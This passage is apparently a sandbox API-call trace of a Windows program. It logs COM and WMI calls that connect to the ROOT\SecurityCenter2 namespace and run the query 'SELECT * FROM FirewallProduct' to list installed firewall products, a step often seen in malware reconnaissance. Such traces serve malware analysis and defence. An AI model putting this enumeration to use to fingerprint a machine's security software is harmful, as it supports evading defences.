[6]=0x7d, [7]=0xcc)), ppvObject=0x19f12c | out: ppvObject=0x19f12c*=0x5542510) returned 0x0 [0266.552] WbemDefPath:IUnknown:AddRef (This=0x5542510) returned 0x3 [0266.552] WbemDefPath:IUnknown:Release (This=0x5542510) returned 0x2 [0266.552] WbemDefPath:IWbemPath:SetText (This=0x5542510, uMode=0x4, pszPath="ROOT\\SecurityCenter2") returned 0x0 [0266.552] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5542510, puCount=0x19f2b0 | out: puCount=0x19f2b0*=0x2) returned 0x0 [0266.552] WbemDefPath:IWbemPath:GetText (in: This=0x5542510, lFlags=4, puBuffLength=0x19f2ac*=0x0, pszText=0x0 | out: puBuffLength=0x19f2ac*=0x19, pszText=0x0) returned 0x0 [0266.552] WbemDefPath:IWbemPath:GetText (in: This=0x5542510, lFlags=4, puBuffLength=0x19f2ac*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x19f2ac*=0x19, pszText="\\\\.\\ROOT\\SecurityCenter2") returned 0x0 [0266.552] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5542510, puCount=0x19f29c | out: puCount=0x19f29c*=0x2) returned 0x0 [0266.552] WbemDefPath:IWbemPath:GetText (in: This=0x5542510, lFlags=4, puBuffLength=0x19f298*=0x0, pszText=0x0 | out: puBuffLength=0x19f298*=0x19, pszText=0x0) returned 0x0 [0266.552] WbemDefPath:IWbemPath:GetText (in: This=0x5542510, lFlags=4, puBuffLength=0x19f298*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x19f298*=0x19, pszText="\\\\.\\ROOT\\SecurityCenter2") returned 0x0 [0266.552] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f230 | out: ppv=0x19f230*=0x601a94) returned 0x0 [0266.552] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f228 | out: pAptType=0x19f228*=1) returned 0x0 [0266.552] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f22c | out: ppvObject=0x19f22c*=0x0) returned 0x80004002 [0266.552] IUnknown:Release (This=0x601a94) returned 0x1 [0266.553] CoGetClassObject (in: rclsid=0x6bdd2c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19ee50 | out: ppv=0x19ee50*=0x5543148) returned 0x0 [0266.553] WbemLocator:IUnknown:QueryInterface (in: This=0x5543148, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19f068 | out: ppvObject=0x19f068*=0x0) returned 0x80004002 [0266.553] WbemLocator:IClassFactory:CreateInstance (in: This=0x5543148, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f07c | out: ppvObject=0x19f07c*=0x54ba548) returned 0x0 [0266.553] WbemLocator:IUnknown:Release (This=0x5543148) returned 0x0 [0266.553] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba548, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ec9c | out: ppvObject=0x19ec9c*=0x54ba548) returned 0x0 [0266.553] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba548, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ec58 | out: ppvObject=0x19ec58*=0x0) returned 0x80004002 [0266.553] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba548, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e84c | out: ppvObject=0x19e84c*=0x0) returned 0x80004002 [0266.553] WbemLocator:IUnknown:AddRef (This=0x54ba548) returned 0x3 [0266.553] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba548, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e5b4 | out: ppvObject=0x19e5b4*=0x0) returned 0x80004002 [0266.553] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba548, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e564 | out: ppvObject=0x19e564*=0x0) returned 0x80004002 [0266.553] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba548, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e570 | out: ppvObject=0x19e570*=0x0) returned 0x80004002 [0266.553] CoGetContextToken (in: pToken=0x19e5d0 | out: pToken=0x19e5d0) returned 0x0 [0266.553] CoGetContextToken (in: pToken=0x19e9d8 | out: pToken=0x19e9d8) returned 0x0 [0266.554] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba548, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ea68 | out: ppvObject=0x19ea68*=0x0) returned 0x80004002 [0266.554] WbemLocator:IUnknown:Release (This=0x54ba548) returned 0x2 [0266.554] WbemLocator:IUnknown:Release (This=0x54ba548) returned 0x1 [0266.554] CoGetContextToken (in: pToken=0x19f048 | out: pToken=0x19f048) returned 0x0 [0266.554] CoGetContextToken (in: pToken=0x19efa8 | out: pToken=0x19efa8) returned 0x0 [0266.554] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba548, riid=0x19f078*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19f074 | out: ppvObject=0x19f074*=0x54ba548) returned 0x0 [0266.554] WbemLocator:IUnknown:AddRef (This=0x54ba548) returned 0x3 [0266.554] WbemLocator:IUnknown:Release (This=0x54ba548) returned 0x2 [0266.554] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5542510, puCount=0x19f20c | out: puCount=0x19f20c*=0x2) returned 0x0 [0266.554] WbemDefPath:IWbemPath:GetText (in: This=0x5542510, lFlags=8, puBuffLength=0x19f208*=0x0, pszText=0x0 | out: puBuffLength=0x19f208*=0x19, pszText=0x0) returned 0x0 [0266.554] WbemDefPath:IWbemPath:GetText (in: This=0x5542510, lFlags=8, puBuffLength=0x19f208*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x19f208*=0x19, pszText="\\\\.\\ROOT\\SecurityCenter2") returned 0x0 [0266.554] CoCreateInstance (in: rclsid=0x6d3c1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6d3c12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x19f0d0 | out: ppv=0x19f0d0*=0x54ba5a8) returned 0x0 [0266.554] WbemLocator:IWbemLocator:ConnectServer (in: This=0x54ba5a8, strNetworkResource="\\\\.\\ROOT\\SecurityCenter2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x19f178 | out: ppNamespace=0x19f178*=0x54b52c0) returned 0x0 [0266.565] WbemLocator:IUnknown:QueryInterface (in: This=0x54b52c0, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f000 | out: ppvObject=0x19f000*=0x66fc4c) returned 0x0 [0266.565] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x66fc4c, pProxy=0x54b52c0, pAuthnSvc=0x19f050, pAuthzSvc=0x19f04c, pServerPrincName=0x19f044, pAuthnLevel=0x19f048, pImpLevel=0x19f038, pAuthInfo=0x19f03c, pCapabilites=0x19f040 | out: pAuthnSvc=0x19f050*=0xa, pAuthzSvc=0x19f04c*=0x0, pServerPrincName=0x19f044, pAuthnLevel=0x19f048*=0x6, pImpLevel=0x19f038*=0x2, pAuthInfo=0x19f03c, pCapabilites=0x19f040*=0x1) returned 0x0 [0266.565] WbemLocator:IUnknown:Release (This=0x66fc4c) returned 0x1 [0266.565] WbemLocator:IUnknown:QueryInterface (in: This=0x54b52c0, riid=0x6d3c10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19eff4 | out: ppvObject=0x19eff4*=0x66fc70) returned 0x0 [0266.565] WbemLocator:IUnknown:QueryInterface (in: This=0x54b52c0, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19eff0 | out: ppvObject=0x19eff0*=0x66fc4c) returned 0x0 [0266.565] WbemLocator:IClientSecurity:SetBlanket (This=0x66fc4c, pProxy=0x54b52c0, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0266.566] WbemLocator:IUnknown:Release (This=0x66fc4c) returned 0x2 [0266.566] WbemLocator:IUnknown:Release (This=0x66fc70) returned 0x1 [0266.566] CoTaskMemFree (pv=0x54bc538) [0266.566] WbemLocator:IUnknown:Release (This=0x54ba5a8) returned 0x0 [0266.566] WbemLocator:IUnknown:QueryInterface (in: This=0x54b52c0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ebf0 | out: ppvObject=0x19ebf0*=0x66fc70) returned 0x0 [0266.566] WbemLocator:IUnknown:QueryInterface (in: This=0x66fc70, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ebac | out: ppvObject=0x19ebac*=0x0) returned 0x80004002 [0266.567] WbemLocator:IUnknown:QueryInterface (in: This=0x66fc70, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e9cc | out: ppvObject=0x19e9cc*=0x0) returned 0x80004002 [0266.567] WbemLocator:IUnknown:QueryInterface (in: This=0x54b52c0, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e7a4 | out: ppvObject=0x19e7a4*=0x0) returned 0x80004002 [0266.567] WbemLocator:IUnknown:AddRef (This=0x66fc70) returned 0x3 [0266.567] WbemLocator:IUnknown:QueryInterface (in: This=0x66fc70, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e50c | out: ppvObject=0x19e50c*=0x0) returned 0x80004002 [0266.567] WbemLocator:IUnknown:QueryInterface (in: This=0x66fc70, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e4bc | out: ppvObject=0x19e4bc*=0x0) returned 0x80004002 [0266.567] WbemLocator:IUnknown:QueryInterface (in: This=0x66fc70, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e4c8 | out: ppvObject=0x19e4c8*=0x66fbcc) returned 0x0 [0266.568] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x66fbcc, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e4d0 | out: pCid=0x19e4d0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0266.568] WbemLocator:IUnknown:Release (This=0x66fbcc) returned 0x3 [0266.568] CoGetContextToken (in: pToken=0x19e528 | out: pToken=0x19e528) returned 0x0 [0266.568] CoGetContextToken (in: pToken=0x19e930 | out: pToken=0x19e930) returned 0x0 [0266.568] WbemLocator:IUnknown:QueryInterface (in: This=0x66fc70, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e9c0 | out: ppvObject=0x19e9c0*=0x66fc54) returned 0x0 [0266.568] WbemLocator:IRpcOptions:Query (in: This=0x66fc54, pPrx=0x66fc70, dwProperty=2, pdwValue=0x19e9e8 | out: pdwValue=0x19e9e8) returned 0x80004002 [0266.568] WbemLocator:IUnknown:Release (This=0x66fc54) returned 0x3 [0266.568] WbemLocator:IUnknown:Release (This=0x66fc70) returned 0x2 [0266.568] CoGetContextToken (in: pToken=0x19ef00 | out: pToken=0x19ef00) returned 0x0 [0266.568] CoGetContextToken (in: pToken=0x19ee60 | out: pToken=0x19ee60) returned 0x0 [0266.568] WbemLocator:IUnknown:QueryInterface (in: This=0x66fc70, riid=0x19ef30*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x19ef2c | out: ppvObject=0x19ef2c*=0x54b52c0) returned 0x0 [0266.568] WbemLocator:IUnknown:AddRef (This=0x54b52c0) returned 0x4 [0266.568] WbemLocator:IUnknown:Release (This=0x54b52c0) returned 0x3 [0266.568] WbemLocator:IUnknown:Release (This=0x54b52c0) returned 0x2 [0266.568] SysStringLen (param_1=0x0) returned 0x0 [0266.569] CoGetContextToken (in: pToken=0x19ef10 | out: pToken=0x19ef10) returned 0x0 [0266.569] WbemLocator:IUnknown:AddRef (This=0x66fc70) returned 0x3 [0266.569] WbemLocator:IUnknown:QueryInterface (in: This=0x66fc70, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19eda4 | out: ppvObject=0x19eda4*=0x66fc70) returned 0x0 [0266.569] WbemLocator:IUnknown:Release (This=0x66fc70) returned 0x3 [0266.569] WbemLocator:IUnknown:Release (This=0x66fc70) returned 0x2 [0266.569] CoGetContextToken (in: pToken=0x19f008 | out: pToken=0x19f008) returned 0x0 [0266.569] WbemLocator:IUnknown:AddRef (This=0x54b52c0) returned 0x3 [0266.569] IWbemServices:ExecQuery (in: This=0x54b52c0, strQueryLanguage="WQL", strQuery="SELECT * FROM FirewallProduct", lFlags=16, pCtx=0x0, ppEnum=0x19f214 | out: ppEnum=0x19f214*=0x6636b8) returned 0x0 [0266.577] IUnknown:QueryInterface (in: This=0x6636b8, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f078 | out: ppvObject=0x19f078*=0x6636bc) returned 0x0 [0266.578] IClientSecurity:QueryBlanket (in: This=0x6636bc, pProxy=0x6636b8, pAuthnSvc=0x19f0c8, pAuthzSvc=0x19f0c4, pServerPrincName=0x19f0bc, pAuthnLevel=0x19f0c0, pImpLevel=0x19f0b0, pAuthInfo=0x19f0b4, pCapabilites=0x19f0b8 | out: pAuthnSvc=0x19f0c8*=0xa, pAuthzSvc=0x19f0c4*=0x0, pServerPrincName=0x19f0bc, pAuthnLevel=0x19f0c0*=0x6, pImpLevel=0x19f0b0*=0x2, pAuthInfo=0x19f0b4, pCapabilites=0x19f0b8*=0x1) returned 0x0 [0266.578] IUnknown:Release (This=0x6636bc) returned 0x1 [0266.578] IUnknown:QueryInterface (in: This=0x6636b8, riid=0x6d3c10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f06c | out: ppvObject=0x19f06c*=0x66fe70) returned 0x0 [0266.578] IUnknown:QueryInterface (in: This=0x6636b8, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f068 | out: ppvObject=0x19f068*=0x6636bc) returned 0x0 [0266.578] IClientSecurity:SetBlanket (This=0x6636bc, pProxy=0x6636b8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0266.580] IUnknown:Release (This=0x6636bc) returned 0x2 [0266.580] WbemLocator:IUnknown:Release (This=0x66fe70) returned 0x1 [0266.580] CoTaskMemFree (pv=0x54bc538) [0266.580] IUnknown:QueryInterface (in: This=0x6636b8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ec64 | out: ppvObject=0x19ec64*=0x66fe70) returned 0x0 [0266.580] WbemLocator:IUnknown:QueryInterface (in: This=0x66fe70, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ec20 | out: ppvObject=0x19ec20*=0x0) returned 0x80004002 [0266.580] WbemLocator:IUnknown:QueryInterface (in: This=0x66fe70, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ea3c | out: ppvObject=0x19ea3c*=0x0) returned 0x80004002 [0266.581] IUnknown:QueryInterface (in: This=0x6636b8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e814 | out: ppvObject=0x19e814*=0x0) returned 0x80004002 [0266.581] WbemLocator:IUnknown:AddRef (This=0x66fe70) returned 0x3 [0266.582] WbemLocator:IUnknown:QueryInterface (in: This=0x66fe70, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e57c | out: ppvObject=0x19e57c*=0x0) returned 0x80004002 [0266.582] WbemLocator:IUnknown:QueryInterface (in: This=0x66fe70, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e52c | out: ppvObject=0x19e52c*=0x0) returned 0x80004002 [0266.582] WbemLocator:IUnknown:QueryInterface (in: This=0x66fe70, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e538 | out: ppvObject=0x19e538*=0x66fdcc) returned 0x0 [0266.582] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x66fdcc, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e540 | out: pCid=0x19e540*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0266.582] WbemLocator:IUnknown:Release (This=0x66fdcc) returned 0x3 [0266.582] CoGetContextToken (in: pToken=0x19e598 | out: pToken=0x19e598) returned 0x0 [0266.582] CoGetContextToken (in: pToken=0x19e9a0 | out: pToken=0x19e9a0) returned 0x0 [0266.582] WbemLocator:IUnknown:QueryInterface (in: This=0x66fe70, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ea30 | out: ppvObject=0x19ea30*=0x66fe54) returned 0x0 [0266.582] WbemLocator:IRpcOptions:Query (in: This=0x66fe54, pPrx=0x66fe70, dwProperty=2, pdwValue=0x19ea58 | out: pdwValue=0x19ea58) returned 0x80004002 [0266.582] WbemLocator:IUnknown:Release (This=0x66fe54) returned 0x3 [0266.582] WbemLocator:IUnknown:Release (This=0x66fe70) returned 0x2 [0266.582] CoGetContextToken (in: pToken=0x19ef78 | out: pToken=0x19ef78) returned 0x0 [0266.582] CoGetContextToken (in: pToken=0x19eed8 | out: pToken=0x19eed8) returned 0x0 [0266.582] WbemLocator:IUnknown:QueryInterface (in: This=0x66fe70, riid=0x19efa8*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x19efa4 | out: ppvObject=0x19efa4*=0x6636b8) returned 0x0 [0266.582] IUnknown:AddRef (This=0x6636b8) returned 0x4 [0266.582] IUnknown:Release (This=0x6636b8) returned 0x3 [0266.583] IUnknown:Release (This=0x6636b8) returned 0x2 [0266.583] WbemLocator:IUnknown:Release (This=0x54b52c0) returned 0x2 [0266.583] SysStringLen (param_1=0x0) returned 0x0 [0266.583] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5542510, puCount=0x19f260 | out: puCount=0x19f260*=0x2) returned 0x0 [0266.583] WbemDefPath:IWbemPath:GetText (in: This=0x5542510, lFlags=4, puBuffLength=0x19f25c*=0x0, pszText=0x0 | out: puBuffLength=0x19f25c*=0x19, pszText=0x0) returned 0x0 [0266.583] WbemDefPath:IWbemPath:GetText (in: This=0x5542510, lFlags=4, puBuffLength=0x19f25c*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x19f25c*=0x19, pszText="\\\\.\\ROOT\\SecurityCenter2") returned 0x0 [0266.583] CoGetContextToken (in: pToken=0x19f0b0 | out: pToken=0x19f0b0) returned 0x0 [0266.583] IUnknown:AddRef (This=0x6636b8) returned 0x3 [0266.583] IEnumWbemClassObject:Clone (in: This=0x6636b8, ppEnum=0x19f26c | out: ppEnum=0x19f26c*=0x663848) returned 0x0 [0266.584] IUnknown:QueryInterface (in: This=0x663848, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f130 | out: ppvObject=0x19f130*=0x66384c) returned 0x0 [0266.584] IClientSecurity:QueryBlanket (in: This=0x66384c, pProxy=0x663848, pAuthnSvc=0x19f180, pAuthzSvc=0x19f17c, pServerPrincName=0x19f174, pAuthnLevel=0x19f178, pImpLevel=0x19f168, pAuthInfo=0x19f16c, pCapabilites=0x19f170 | out: pAuthnSvc=0x19f180*=0xa, pAuthzSvc=0x19f17c*=0x0, pServerPrincName=0x19f174, pAuthnLevel=0x19f178*=0x6, pImpLevel=0x19f168*=0x2, pAuthInfo=0x19f16c, pCapabilites=0x19f170*=0x1) returned 0x0 [0266.584] IUnknown:Release (This=0x66384c) returned 0x1 [0266.584] IUnknown:QueryInterface (in: This=0x663848, riid=0x6d3c10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f124 | out: ppvObject=0x19f124*=0x66eb70) returned 0x0 [0266.584] IUnknown:QueryInterface (in: This=0x663848, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f120 | out: ppvObject=0x19f120*=0x66384c) returned 0x0 [0266.584] IClientSecurity:SetBlanket (This=0x66384c, pProxy=0x663848, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0266.586] IUnknown:Release (This=0x66384c) returned 0x2 [0266.586] WbemLocator:IUnknown:Release (This=0x66eb70) returned 0x1 [0266.586] CoTaskMemFree (pv=0x54bc538) [0266.586] IUnknown:QueryInterface (in: This=0x663848, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed0c | out: ppvObject=0x19ed0c*=0x66eb70) returned 0x0 [0266.587] WbemLocator:IUnknown:QueryInterface (in: This=0x66eb70, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ecc8 | out: ppvObject=0x19ecc8*=0x0) returned 0x80004002 [0266.587] WbemLocator:IUnknown:QueryInterface (in: This=0x66eb70, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, 